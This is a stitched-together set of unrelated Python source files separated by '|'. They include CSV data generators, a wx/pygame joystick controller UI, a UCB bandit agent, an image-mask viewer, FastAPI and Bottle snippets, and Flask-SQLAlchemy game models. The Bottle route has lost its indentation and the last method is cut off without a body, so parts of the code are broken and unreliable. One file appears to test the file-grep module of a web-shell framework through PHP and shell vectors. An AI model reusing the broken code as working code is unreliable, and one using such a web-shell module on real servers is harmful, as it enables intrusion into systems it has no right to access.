    d = {'CityId': array_index, 'Name': array_cities, 'Countries': array_countries, 'Population': array_people}
    df = pandas.DataFrame(data = d)
    df.to_csv('cities.csv', sep = ';', index = False)
def nomer(n):
    """Generate *n* hotel rooms with random amenities into rooms.csv.

    Columns: NomerId (0..n-1), Nomer (room number starting at 100),
    Udobstva (bath/shower), Kondei (air conditioning), Bed (joined/separate).
    """
    bath_options = ['Ванна', 'Душ']
    ac_options = ['Не имеется', 'В наличии']
    bed_options = ['Объединенная', 'Разделенные']
    baths = []
    acs = []
    beds = []
    ids = []
    room_numbers = [room for room in range(100, n + 100)]
    for idx in range(n):
        baths.append(random.choice(bath_options))
        acs.append(random.choice(ac_options))
        beds.append(random.choice(bed_options))
        ids.append(idx)
    rows = {'NomerId': ids, 'Nomer': room_numbers, 'Udobstva': baths, 'Kondei': acs, 'Bed': beds}
    frame = pandas.DataFrame(data = rows)
    frame.to_csv('rooms.csv', sep = ';', index = False)
def chelovek(n):
    """Generate *n* people (name, family, random city id in 0..199) into person.csv.

    Columns: PersonId, Name, Families, CityId (separator ';', no index).

    Raises:
        ValueError: if n exceeds the number of distinct name/family
            combinations (the original code crashed later, inside the
            DataFrame constructor, with mismatched column lengths).
    """
    names = ['Иван', 'Никита', 'Вася', 'Серега', 'Маша', 'Катя', 'Вера', 'Полина', 'Коля', 'Саша', 'Настя', 'Оля', 'София', 'Дима', 'Валерия', 'Елена', 'Алиса', 'Вадим', 'Илья', 'Макар', 'Радик', 'Федор', 'Цезарь', 'Чарьлз', 'Юлий', 'Мира', 'Марта', 'Одетта', 'Роза', 'Тая', 'Вероника', 'Урсула']
    families = ['Коваленко', 'Левченко', 'Маркес', 'Моралес', 'Плотейко', 'Басюк', 'Фрост', 'Берник', 'Йорк', 'Беккер', 'Миллер', 'Васейко', 'Шевченко', 'Франд', 'Шнайдер', 'Мельник', 'Ткаченко', 'Юрченко', 'Боленьчук', 'Васельчук', 'Родригес', 'Фернандес', 'Гонсалес', 'Перес', 'Санчес', 'Мартинес', 'Алварес', 'Торрес', 'Флорес', 'Гарсиа', 'Кастаьо', 'Ромеро']
    if n > len(names) * len(families):
        raise ValueError("n=%d exceeds the %d distinct name/family combinations"
                         % (n, len(names) * len(families)))
    array_names = []
    array_families = []
    for name in names:
        for family in families:
            if len(array_names) < n:
                array_names.append(name)
                array_families.append(family)
    # City ids: each batch of 200 is a random permutation of 0..199.
    array_cityId = []
    full_batches, remainder = divmod(n, 200)
    for _ in range(full_batches):
        array_cityId.extend(int(j) for j in random.sample(range(200), 200))
    # BUGFIX: the original dropped the remainder, so any n that was not a
    # multiple of 200 produced mismatched column lengths and a crash.
    array_cityId.extend(int(j) for j in random.sample(range(200), remainder))
    d = {'PersonId': list(range(n)), 'Name': array_names, 'Families': array_families, 'CityId': array_cityId}
    df = pandas.DataFrame(data = d)
    df.to_csv('person.csv', sep = ';', index = False)
def sadnnie_nomera(n):
    """Generate *n* random room bookings into sadnnie_nomera1.csv.

    Each row pairs a random room id and person id (both in [0, n)),
    a stay length of 1-30 days and a price of 1000 per day.
    """
    # NOTE: the original read rooms.csv and person.csv into dataframes that
    # were never used (ids are drawn from range(n) regardless); those dead
    # reads are removed so the function no longer requires the files to exist.
    array_days = []
    array_price = []
    array_personId = []
    array_nomerId = []
    for i in range(n):
        days = random.randint(1, 30)
        array_days.append(days)
        array_price.append(days * 1000)  # flat rate: 1000 per day
        array_personId.append(random.randint(0, n - 1))
        array_nomerId.append(random.randint(0, n - 1))
    d = {'NomerId': array_nomerId, 'PersonId': array_personId, 'Days': array_days, 'Price': array_price}
    df = pandas.DataFrame(data = d)
    df.to_csv('sadnnie_nomera1.csv', sep = ';', index = False)
# Run the selected generator(s) only when executed as a script.
if __name__ == '__main__':
    main()
|
import wx
import pygame
import serial.tools.list_ports
class MainFrame(wx.Frame):
    """Main window: serial-port selection, record/file controls, and a
    joystick status display that is refreshed by polling pygame."""
    def __init__(self,parent,ptitle):
        wx.Frame.__init__(self,parent,title=ptitle)
        # Name of the currently selected serial port, or None when disconnected
        self.selectedPort = None
        # pygame supplies the joystick polling backend for this wx UI
        pygame.init()
        pygame.joystick.init()
        self.InitUI()
    def InitUI(self):
        """Build the menu, buttons and panels, then enter the joystick
        polling loop.

        NOTE(review): the while-loop at the bottom blocks this method (and
        therefore the caller's wx MainLoop) until a pygame.QUIT event is
        posted — confirm the UI stays responsive as intended.
        """
        menubar = wx.MenuBar()
        fileMenu = wx.Menu()
        mquit = wx.MenuItem(fileMenu,101,'&Quit\tCtrl+Q','Quit the Application')
        mquit.SetBitmap(wx.Image('door_exit.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap())
        fileMenu.Append(mquit)
        fileMenu.AppendSeparator()
        menubar.Append(fileMenu,'&File')
        self.SetMenuBar(menubar)
        self.Bind(wx.EVT_MENU, self.OnQuit,mquit)
        self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
        panel = wx.Panel(self)
        label = wx.StaticText(panel,label="Port: ",pos=(10,10))
        # NOTE(review): comports() yields ListPortInfo objects, not strings —
        # verify wx.ComboBox accepts them as 'choices'.
        ports = list(serial.tools.list_ports.comports())
        self.portsbox = wx.ComboBox(panel,choices=ports,pos=(40,8))
        # Connect / disconnect buttons share the same position; exactly one
        # of the two is visible at any time (toggled in OnConn/OnDisconn).
        self.connbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('conn-icon.png',wx.BITMAP_TYPE_ANY),size=(102,24),pos=(160,6.8))
        self.Bind(wx.EVT_BUTTON, self.OnConn,self.connbtn)
        self.disconnbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('discon-icon.png',wx.BITMAP_TYPE_ANY),size=(102,24),pos=(160,6.8))
        self.disconnbtn.Hide()
        self.Bind(wx.EVT_BUTTON, self.OnDisconn,self.disconnbtn)
        # File and recording control buttons
        self.newfbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('new-file.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(40,35))
        self.openfbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('open-file.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(80,35))
        self.recbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('record.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(120,35))
        self.stopbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('stop.ico',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(160,35))
        self.Bind(wx.EVT_BUTTON, self.OnNewf, self.newfbtn)
        self.Bind(wx.EVT_BUTTON, self.OnOpenf, self.openfbtn)
        self.Bind(wx.EVT_BUTTON, self.DoRecordStart, self.recbtn)
        self.Bind(wx.EVT_BUTTON, self.DoRecordStop, self.stopbtn)
        jpanel = JoystickPanel(panel,pos=(500,10),size=(340,565))
        self.SetSize((860,640))
        self.Centre()
        self.Show()
        # --- joystick polling loop, ticks at 20 Hz until pygame.QUIT ---
        done = False
        textPrint = TextPrint()
        joystick_count=pygame.joystick.get_count()
        clock = pygame.time.Clock()
        textPrint.print(jpanel, "Number of joysticks: {}".format(joystick_count))
        textPrint.indent()
        while done==False:
            for event in pygame.event.get():
                if event.type==pygame.QUIT:
                    done=True
                if event.type==pygame.JOYBUTTONDOWN:
                    print("Joystick button presed.")
                if event.type==pygame.JOYBUTTONUP:
                    print("Joystick button released.")
            # Redraw the whole status block from the top-left each frame
            textPrint.reset()
            # NOTE(review): the inner loops below reuse the name `i`,
            # shadowing the joystick index of this outer loop.
            for i in range(joystick_count):
                joystick=pygame.joystick.Joystick(i)
                joystick.init()
                textPrint.print(jpanel,"Joystick {}".format(i))
                textPrint.indent()
                name=joystick.get_name()
                textPrint.print(jpanel, "Joystick name: {}".format(name))
                axes=joystick.get_numaxes()
                textPrint.print(jpanel, "Number of axes: {}".format(axes))
                textPrint.indent()
                for i in range(axes):
                    axis=joystick.get_axis(i)
                    textPrint.print(jpanel,"Axis {}value: {:>6.3f}".format(i,axis))
                textPrint.unindent()
                buttons=joystick.get_numbuttons()
                textPrint.print(jpanel, "Number of buttons: {}".format(buttons))
                textPrint.indent()
                for i in range(buttons):
                    button=joystick.get_button(i)
                    textPrint.print(jpanel, "Button {:>2} value: {}".format(i,button))
                textPrint.unindent()
                hats=joystick.get_numhats()
                textPrint.print(jpanel, "Number of hats: {}".format(hats))
                textPrint.indent()
                for i in range(hats):
                    hat=joystick.get_hat(i)
                    textPrint.print(jpanel, "Hat {} value: {}".format(i, str(hat)))
                textPrint.unindent()
                textPrint.unindent()
            clock.tick(20)
    def OnQuit(self,e):
        """Menu 'Quit': stop the pygame loop, then close the frame."""
        pygame.event.clear()
        pygame.event.post(pygame.event.Event(pygame.QUIT))
        self.Close()
    def OnCloseWindow(self,e):
        """Window close: stop the pygame loop, then destroy the frame."""
        pygame.event.clear()
        pygame.event.post(pygame.event.Event(pygame.QUIT))
        self.Destroy()
    def OnConn(self,e):
        """Select the chosen port and swap the connect button for disconnect."""
        # NOTE(review): this log message says "disconnect:" although this is
        # the connect handler (and OnDisconn prints "connect") — the two
        # strings appear swapped.
        print("disconnect:"+self.portsbox.GetStringSelection())
        if(self.portsbox.GetStringSelection()!=""):
            self.selectedPort = self.portsbox.GetStringSelection()
            self.connbtn.Hide()
            self.disconnbtn.Show()
        else:
            # Thai message: "Please select a port"
            wx.MessageBox('กรุณาเลือก Port','Error',wx.OK|wx.ICON_INFORMATION)
    def OnDisconn(self,e):
        """Clear the selected port and swap the disconnect button for connect."""
        print("connect")
        self.selectedPort = None
        self.connbtn.Show()
        self.disconnbtn.Hide()
    def OnOpenf(self,e):
        """Let the user pick an existing log file and open it read/write."""
        with wx.FileDialog(self, "Open recorded file", wildcard="Text files (*.txt)|*.txt",style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST) as fileDialog:
            if fileDialog.ShowModal()==wx.ID_CANCEL:
                return
            pathname = fileDialog.GetPath()
            try:
                with open(pathname, 'r+') as file:
                    self.DoLoadFile(file)
            except IOError:
                wx.LogError("Cannot open file '%s'." % pathname)
    def OnNewf(self,e):
        """Let the user create a new log file (overwrite confirmed by dialog)."""
        with wx.FileDialog(self, "Create new file", wildcard="Text files (*.txt)|*.txt",style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT) as fileDialog:
            if fileDialog.ShowModal()==wx.ID_CANCEL:
                return
            pathname = fileDialog.GetPath()
            try:
                with open(pathname, 'w') as file:
                    self.DoLoadFile(file)
            except IOError:
                wx.LogError("Cannot save current data in file '%s'." % pathname)
    def DoLoadFile(self,f):
        """Remember the chosen file object as the current log target.

        NOTE(review): the `with open(...)` in the callers closes this file
        as soon as they return — confirm the handle is still usable later.
        """
        self.logFile = f
        print(self.logFile)
    def DoRecordStart(self,e):
        """Turn recording on.

        NOTE(review): self.recFlag / self.logFile are never initialized in
        __init__, so pressing Record before loading a file raises
        AttributeError here.
        """
        self.recFlag = True
        print(self.logFile)
    def DoRecordStop(self,e):
        """Turn recording off and try to close the current log file."""
        self.recFlag = False
        try:
            print(self.logFile)
            self.logFile.close()
        except:
            # No file was ever loaded (self.logFile missing) — best effort.
            print('No file')
class JoystickPanel(wx.Panel):
    """A plain white panel that hosts the joystick status text."""
    def __init__(self, parent, *args, **kwargs):
        wx.Panel.__init__(self, parent, *args, **kwargs)
        white = (255, 255, 255)
        self.SetBackgroundColour(white)
class TextPrint:
    """Writes successive text lines onto a wx panel while tracking an
    indentation level and a vertical cursor position."""
    def __init__(self):
        self.reset()
    def print(self, panel, textString):
        """Render one line at the current cursor and move the cursor down."""
        position = [self.x, self.y]
        wx.StaticText(panel, label=textString, pos=position)
        self.y = self.y + self.line_height
    def reset(self):
        """Move the cursor back to the top-left starting position."""
        self.x, self.y, self.line_height = 10, 10, 15
    def indent(self):
        """Shift subsequent lines one level (10 px) to the right."""
        self.x = self.x + 10
    def unindent(self):
        """Shift subsequent lines one level (10 px) back to the left."""
        self.x = self.x - 10
# Start the wx application and show the controller window.
if __name__=='__main__':
    ex = wx.App(False)
    MainFrame(None,'Esan3D - Controller')
    ex.MainLoop()
|
import numpy as np
from tensorboardX import SummaryWriter
from K_Armed_Testbed import K_Armed
class UCB_Agent(object):
    """Upper-Confidence-Bound agent for a K-armed bandit testbed.

    Each step pulls the arm maximizing Q[a] + c*sqrt(ln(t)/N[a]) and logs
    the running average reward and best-action percentage to TensorBoard.
    """
    def __init__(self, env, maxItr = 10000, c = 2):
        self.env = env          # bandit environment; must expose .K and .step(arm)
        self.maxItr = maxItr    # total number of pulls per learn() run
        self.c = c              # exploration coefficient
        self.avgReward = []     # running average reward after each step
        self.bestAction = []    # percentage of optimal-arm pulls after each step
    def learn(self):
        """Run one UCB session of maxItr steps, logging progress."""
        Q = [0 for i in range(self.env.K)]  # per-arm value estimates
        N = [0 for i in range(self.env.K)]  # per-arm pull counts
        self.avgReward = []
        # NOTE(review): this resets self.rightAction, but results below are
        # appended to self.bestAction — a second learn() call on the same
        # agent would keep stale bestAction data. Looks like a typo.
        self.rightAction = []
        avgReward = 0
        bestAction = 0
        writer = SummaryWriter(comment="KABUCB_{}".format(self.c))
        for epi in range(1,self.maxItr+1):
            # con = c^2 * ln(t), so sqrt(con / N) == c * sqrt(ln(t) / N)
            con = (self.c**2)*np.log(epi)
            # NOTE(review): N starts all-zero, so con/N divides by zero
            # (inf/nan with a runtime warning) until arms have been pulled;
            # also at epi=1, ln(1)=0 gives 0/0 = nan — confirm intended.
            arm = np.argmax(Q+np.sqrt(np.array([con])/N))
            reward,isBest = self.env.step(arm)
            N[arm] = N[arm]+1
            # Incremental mean update of the pulled arm's estimate
            Q[arm] = Q[arm]+1.0/N[arm]*(reward-Q[arm])
            # Incremental mean of overall reward across all steps
            avgReward = avgReward + 1.0/epi*(reward-avgReward)
            if isBest:
                bestAction = bestAction+1
            self.avgReward.append(avgReward)
            self.bestAction.append(bestAction/epi*100)
            # Console progress report every 10% of the run
            if epi%int(self.maxItr/10.0) == 0:
                print("%d/%d: average_reward=%.3f, best_action=%.1f" % (\
                    epi,self.maxItr, self.avgReward[-1], self.bestAction[-1]))
            writer.add_scalar("average_reward", self.avgReward[-1],epi)
            writer.add_scalar("best_action", self.bestAction[-1],epi)
        print("Done: average_reward=%.3f, best_action=%.1f" % (\
            self.avgReward[-1], self.bestAction[-1]))
# Sweep the exploration constant c over a 10-armed bandit.
if __name__ == "__main__":
    env = K_Armed(10)
    es = [0.5,1,2]
    for i in es:
        agent = UCB_Agent(env,c=i)
        agent.learn()
|
import json
import matplotlib.pyplot as plt
import numpy as np
import sys
from constants import image_height, image_width
from img import get_img
from preprocess import get_true_mask
def show(id, img_path, true_masks):
    """Display the image twice side by side: first multiplied by the mask,
    then by its complement, so the masked region can be inspected."""
    fig = plt.figure(figsize=(10, 10))
    fig.canvas.set_window_title("Deep Mask: Check mask {}".format(id))
    (mask, _) = true_masks[0]
    mask = mask[:, :, 0]  # single-channel mask
    # Subplot 1 keeps the masked region; subplot 2 keeps everything else.
    for position, weight in ((1, mask), (2, 1 - mask)):
        plt.subplot(1, 2, position)
        pixels = np.array(plt.imread(img_path))
        for channel in range(3):
            pixels[:, :, channel] *= weight
        plt.imshow(pixels.tolist())
    plt.show()
def show_mask(index):
    """Look up *index* (a string key) in the training annotations and
    display its mask; prints a message when the key is missing."""
    with open("../data/data_classification_train.json") as json_file:
        annotations = json.load(json_file)
    if index not in annotations:
        print("Index {} out of range".format(index))
        return
    img_path = "../pictures/pictures_classification_train/{}.png".format(index)
    masks = get_true_mask(annotations[index])
    show(index, img_path, masks)
# --- CLI entry point: expects one numeric picture index on the command line ---
index = None
if len(sys.argv) > 1:
    if (sys.argv[1].isdigit()):
        # BUGFIX: was eval(sys.argv[1]) — int() parses the digit string
        # without executing arbitrary input (isdigit guarantees it parses).
        index = int(sys.argv[1])
if index is None:  # PEP 8: compare with `is None`, not `== None`
    print("Usage: python show_mask.py [0-99]")
else:
    show_mask(str(index))
|
from fastapi.testclient import TestClient
from app.main import app
# Shared test client wrapping the ASGI app directly (no live server needed).
client = TestClient(app)
def test_read_docs():
    """The interactive API docs page must be served successfully."""
    resp = client.get("/docs")
    assert resp.status_code == 200
|
from testfixtures import log_capture
from testsuite.base_fs import BaseFilesystem
from testsuite import config
from core.sessions import SessionURL
from core import modules
from core import utilities
from core import messages
import core.utilities
import subprocess
import os
class FileGrep(BaseFilesystem):
    """Integration tests for the 'file_grep' module.

    Builds a folder tree with files containing known 'stringN' payloads,
    then greps them through the default PHP vector and the shell
    ('grep_sh') vector, checking both matches and error reporting.
    """
    def setUp(self):
        # Volatile session: state is not persisted between tests
        self.session = SessionURL(
            self.url,
            self.password,
            volatile = True
        )
        modules.load_modules(self.session)
        # Create the folder tree
        self.folders_abs, self.folders_rel = self.populate_folders()
        # File i carries the matching 'stringN' payload from the second list
        self.files_abs, self.files_rel = self.populate_files(
            self.folders_abs,
            [ 'string1', 'string12', 'string3', 'string4' ],
            [ 'string1', 'string12', 'string3', 'string4' ]
        )
        # Change mode of the third file to ---x--x--x 0111 execute
        # (file becomes unreadable, so 'string4' must never match below)
        subprocess.check_call(
            config.cmd_env_chmod_s_s % ('0111', self.files_abs[3]),
            shell=True)
        self.run_argv = modules.loaded['file_grep'].run_argv
    def tearDown(self):
        # Reset recursively all the permissions to 0777
        subprocess.check_call(
            config.cmd_env_chmod_s_s % ('-R 0777', self.folders_abs[0]),
            shell=True)
        # Delete files innermost-first, then remove the emptied folders
        for folder in reversed(self.folders_abs):
            subprocess.check_call(
                config.cmd_env_remove_s % (self.files_abs.pop()),
                shell=True)
            subprocess.check_call(
                config.cmd_env_rmdir_s % (folder),
                shell=True)
    def test_file_grep_php(self):
        """Grep through the default PHP vector."""
        # grep string1 -> string[0]
        self.assertEqual(
            self.run_argv([ self.folders_rel[0], 'tring1' ]),
            {
                self.files_rel[0] : ['string1'],
                self.files_rel[1] : ['string12']
            }
        )
        # grep string3 -> []
        self.assertEqual(self.run_argv([ self.folders_rel[0], 'tring4' ]),{})
        # grep string[2-9] -> string[3]
        self.assertEqual(self.run_argv([ self.folders_rel[0], 'tring[2-9]' ]),{ self.files_rel[2] : ['string3'] })
        # grep rpath=folder2 string -> string[3]
        self.assertEqual(self.run_argv([ self.folders_rel[2], 'string.*' ]),{ self.files_rel[2] : ['string3'] })
    def test_file_grep_sh(self):
        """Grep through the shell vector; expectations mirror the PHP vector."""
        # grep string1 -> string[0]
        self.assertEqual(
            self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring1' ]),
            {
                self.files_rel[0] : ['string1'],
                self.files_rel[1] : ['string12']
            }
        )
        # grep string3 -> []
        self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring4' ]),{})
        # grep string[2-9] -> string[3]
        self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring[2-9]' ]),{ self.files_rel[2] : ['string3'] })
        # grep rpath=folder2 string -> string[3]
        self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[2], 'string.*' ]),{ self.files_rel[2] : ['string3'] })
    @log_capture()
    def test_php_err(self, log_captured):
        """Bad path / bad regex via PHP vector must return None and log a warning."""
        # wrong rpath generate None and warning print
        self.assertEqual(self.run_argv([ 'bogus', 'tring4' ]), None)
        self.assertEqual(messages.module_file_grep.failed_retrieve_info,
                        log_captured.records[-1].msg)
        # wrong regex generate None and warning print
        self.assertEqual(self.run_argv([ '\'', 'tring4' ]), None)
        self.assertEqual(messages.module_file_grep.failed_retrieve_info,
                        log_captured.records[-1].msg)
    @log_capture()
    def test_sh_err(self, log_captured):
        """Bad path / bad regex via shell vector must return None and log a warning."""
        # wrong rpath generate None and warning print
        self.assertEqual(self.run_argv([ '-vector', 'grep_sh', 'bogus', 'tring4' ]), None)
        self.assertEqual(messages.module_file_grep.failed_retrieve_info,
                        log_captured.records[-1].msg)
        # wrong regex generate None and warning print
        self.assertEqual(self.run_argv([ '-vector', 'grep_sh', '\'', 'tring4' ]), None)
        self.assertEqual(messages.module_file_grep.failed_retrieve_info,
                        log_captured.records[-1].msg)
|
import requests
import simple.config3
# print(simple.config3.obj.Headers())
# Fetch the shared header definitions from the project's config object.
# NOTE(review): `requests` is imported but not used in this snippet —
# presumably leftover or used further on; confirm before removing.
headers = simple.config3.obj.Headers()
print(headers)
|
# -*- coding: utf-8 -*-
from bottle import route,request
from siteglobals import env, db, config
from utils import *
from backend import Record
@route('/details', method='GET')
def output():
try:
session = db.sessionmaker()
id = getSingleField( 'id', request )
if not id:
raise ElementNotFoundException( id )
record = session.query( Record ).filter( Record.id == id ).one()
if not record:
raise ElementNotFoundException( id )
upload_dir = config.get('site','uploads')
ret = env.get_template('details.html').render( record=record, upload_dir=upload_dir )
session.close()
return ret
except Exception, m:
return env.get_template('error.html').render(err_msg=str(m))
|
from mapyourcity import db
from werkzeug.security import generate_password_hash, check_password_hash
from datetime import datetime
# COMMENTS
class Player(db.Model):
    """A registered player: profile, location, OSM credentials and links to
    game, score and team."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    username = db.Column(db.String(25), unique=True)
    email = db.Column(db.String(120), unique=True)
    description = db.Column(db.String(250))
    pw_hash = db.Column(db.String(160))
    created_at = db.Column(db.Date())
    last_login = db.Column(db.Date())
    lang_short = db.Column(db.String(10))
    avatar = db.Column(db.String(30))
    color = db.Column(db.String(10))
    home_region = db.Column(db.String(80))
    #actual_region = db.Column(db.String(80))
    is_ready = db.Column(db.Boolean)
    lat = db.Column(db.Float)
    lng = db.Column(db.Float)
    country = db.Column(db.String(80))
    osm_login = db.Column(db.String(50), unique=True)
    osm_hash = db.Column(db.String(160))
    latlng = db.Column(db.String(36), unique=False)  # current coordinates
    game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
    game = db.relationship('Game', backref=db.backref('players', lazy='dynamic'))
    score_id = db.Column(db.Integer, db.ForeignKey('scores.id'))
    score = db.relationship('Scores', backref=db.backref('players', lazy='dynamic'))
    theme = db.Column(db.String(15))
    team_id = db.Column(db.Integer, db.ForeignKey('team.id'))
    team = db.relationship('Team', backref=db.backref('players', lazy='dynamic'))

    def __init__(self, username, email, password):
        self.username = username
        self.email = email
        self.pw_hash = self.get_hash(password)
        self.created_at = datetime.now()
        self.last_login = datetime.now()
        # NOTE(review): self.id is still None at this point (assigned on DB
        # flush), so Scores.user_id is created as None — confirm this is
        # reconciled elsewhere.
        self.score = Scores(self.username, self.id)
        self.is_ready = False

    def get_hash(self, password):
        """Hash a plaintext password with werkzeug."""
        return generate_password_hash(password)

    def check_password(self, password):
        """Check a candidate password against the stored hash."""
        return check_password_hash(self.pw_hash, password)

    def set_avatar(self, avatar='default'):
        self.avatar = avatar

    def set_description(self, description):
        self.description = description

    def set_color(self, color):
        self.color = color

    def set_position(self, lat, lng):
        self.lat = lat
        self.lng = lng

    def set_actual_region(self, actual_region):
        # NOTE(review): the actual_region column is commented out above, so
        # this assignment is not persisted.
        self.actual_region = actual_region

    def set_home_region(self, home_region):
        self.home_region = home_region

    def get_country(self, region):
        # NOTE(review): Regions defines region_short/region_full but no
        # 'regionname' column, and the result is a Regions object although
        # the country column is a String — verify this query.
        self.country = Regions.query.filter_by(regionname = region).first()

    def connect_osm(self, login, password):
        self.osm_login = login
        # BUGFIX: was `hash_password(password)` — that name is not defined
        # anywhere in this module (NameError at runtime); use the same
        # werkzeug helper as the account password.
        self.osm_hash = self.get_hash(password)

    def set_language(self, lang_short):
        self.lang_short = lang_short

    def set_username(self, username):
        self.username = username

    def set_email(self, email):
        self.email = email

    def set_last_login(self):
        self.last_login = datetime.now()

    def set_ready(self):
        self.is_ready = True

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Player %r>' % (self.username)
# COMMENTS
class Scores(db.Model):
    """Per-player score counters: all-time, current game and current week."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(25), unique=True)
    user_id = db.Column(db.Integer, unique=True)
    score_all = db.Column(db.Integer)
    score_game = db.Column(db.Integer)
    score_week = db.Column(db.Integer)
    created_at = db.Column(db.Date())
    updated_at = db.Column(db.Date())

    def __init__(self, username, user_id):
        # Executed only once, when the player registers
        self.username = username
        self.user_id = user_id
        self.score_all = 0
        self.score_game = 0
        self.score_week = 0
        self.created_at = datetime.now()
        self.updated_at = datetime.now()

    def init_score_game(self):
        """Reset the current-game score."""
        self.score_game = 0

    def init_score_week(self):
        """Reset the temporary weekly score."""
        self.score_week = 0

    def update(self, score):
        """Add *score* to all three counters and bump the update timestamp."""
        self.score_all += score
        self.score_game += score
        self.score_week += score
        self.updated_at = datetime.now()

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Score %r>' % (self.username)
# COMMENTS
class Game(db.Model):
    """A single game session (single- or multiplayer) and its settings."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    player_id = db.Column(db.Integer)
    region = db.Column(db.String(25))
    game_type = db.Column(db.Integer)   # 1=Singleplayer / 2=Multiplayer
    game_mode = db.Column(db.String(25))  # FFA/MapperOfTheWeek/...
    object_restaurant = db.Column(db.Boolean)
    object_bar = db.Column(db.Boolean)
    object_bank = db.Column(db.Boolean)
    radius = db.Column(db.Integer)
    session_start = db.Column(db.Date())
    session_end = db.Column(db.Date())
    session_status = db.Column(db.String(20))
    is_active = db.Column(db.Boolean)
    gamempffa_id = db.Column(db.Integer, db.ForeignKey('game_mp_ffa.id'))
    gamempffa = db.relationship('Game_mp_ffa', backref=db.backref('games', lazy='dynamic'))

    def __init__(self, player_id, region, game_type, game_mode):
        self.player_id = player_id
        self.region = region
        self.game_type = game_type
        self.game_mode = game_mode
        self.session_start = datetime.now()
        self.session_status = 'started'
        self.is_active = True

    def set_objecttypes(self, restaurant, bar, bank):
        """Select which object categories are part of this game."""
        self.object_restaurant = restaurant
        self.object_bar = bar
        self.object_bank = bank

    def set_radius(self, radius):
        self.radius = radius

    def close_game(self):
        """Mark the session as finished and deactivate it."""
        self.session_status = 'game closed'
        self.is_active = False

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Game %r>' % (self.player_id)
# COMMENTS
class Game_mp_ffa(db.Model):
    """Lobby settings for a multiplayer free-for-all game."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    name = db.Column(db.String(25))
    duration = db.Column(db.Integer)
    pw_hash = db.Column(db.String(160))
    max_players = db.Column(db.Integer)
    num_teams = db.Column(db.Integer)

    def __init__(self, name, duration, password, num_teams, max_players, verify_wheelchair, verify_smoking, verify_vegetarian, object_restaurant, object_bar, object_bank):
        # NOTE(review): the verify_* parameters are accepted but never
        # stored, and the object_* attributes set below have no Column
        # definitions on this model — confirm whether they should persist.
        self.name = name
        self.duration = duration
        self.pw_hash = self.get_hash(password)
        self.max_players = max_players
        self.num_teams = num_teams
        self.object_restaurant = object_restaurant
        self.object_bar = object_bar
        self.object_bank = object_bank

    def get_hash(self, password):
        """Hash the lobby password with werkzeug."""
        return generate_password_hash(password)

    def check_password(self, password):
        """Check a candidate lobby password against the stored hash."""
        return check_password_hash(self.pw_hash, password)

    def __repr__(self):
        # BUGFIX: missing `return`, and self.session_id does not exist on
        # this model (would raise AttributeError) — use the lobby name.
        return '<SP Game Info %r>' % (self.name)
# COMMENTS
class Team(db.Model):
    """A team within a multiplayer game."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    # BUGFIX: game_id was declared twice (once as a plain Integer, once as
    # the ForeignKey below); the second definition silently overrode the
    # first, so the duplicate is removed.
    playerscount = db.Column(db.Integer)
    name = db.Column(db.String(50))
    color = db.Column(db.String(7))
    game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
    game = db.relationship('Game', backref=db.backref('teams', lazy='dynamic'))
    teamscore = db.Column(db.Integer)

    def __init__(self, game_id, name, color, game):
        self.game_id = game_id
        self.name = name
        self.color = color
        self.game = game
        self.playerscount = 0

    def update_playerscount(self):
        """Register one more player on this team."""
        self.playerscount += 1

    #def update_teamscore(self, id, score):

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Team %r>' % (self.name)
# COMMENTS
class TeamPlayer(db.Model):
    """Association of a player with a team."""
    team_id = db.Column(db.Integer, primary_key=True)
    player_id = db.Column(db.Integer)

    def __init__(self, team_id, player_id):
        self.team_id = team_id
        self.player_id = player_id

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
        return '<Team Player %r>' % (self.player_id)
# COMMENTS
class History(db.Model):
    """One scoring event (badge, OSM edit or social action) inside a game."""
    id = db.Column(db.Integer, primary_key=True, unique=True)
    game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
    player_id = db.Column(db.Integer)
    score = db.Column(db.Integer)
    event_type = db.Column(db.String(15)) # badge, osm, social
    timestamp = db.Column(db.Date())

    def __init__(self, game_id, player_id, event_type):
        self.game_id = game_id
        self.player_id = player_id
        self.event_type = event_type
        self.score = 1  # TODO: set dynamically
        self.timestamp = datetime.now()

    #def __repr__(self):
    #    '<History Scores %r %r>' % (self.game_id, self.player_id)
# COMMENTS
class HistoryGeo(db.Model):
    """Geo-object details for a history entry (shares its id with History)."""
    id = db.Column(db.Integer, primary_key=True, unique=True)  # relate with Scores.id
    object_id = db.Column(db.String(25))
    object_name = db.Column(db.String(150))
    object_type = db.Column(db.String(50))
    object_attributes = db.Column(db.String(150))
    object_latlng = db.Column(db.String(36), unique=False)

    def __init__(self, history_id, object_id, object_name, object_type, object_attribute, object_latlng):
        self.id = history_id
        self.object_id = object_id
        self.object_name = object_name
        self.object_type = object_type
        self.object_attributes = object_attribute
        self.object_latlng = object_latlng

    def __repr__(self):
        # BUGFIX: the expression previously lacked `return` (repr was None)
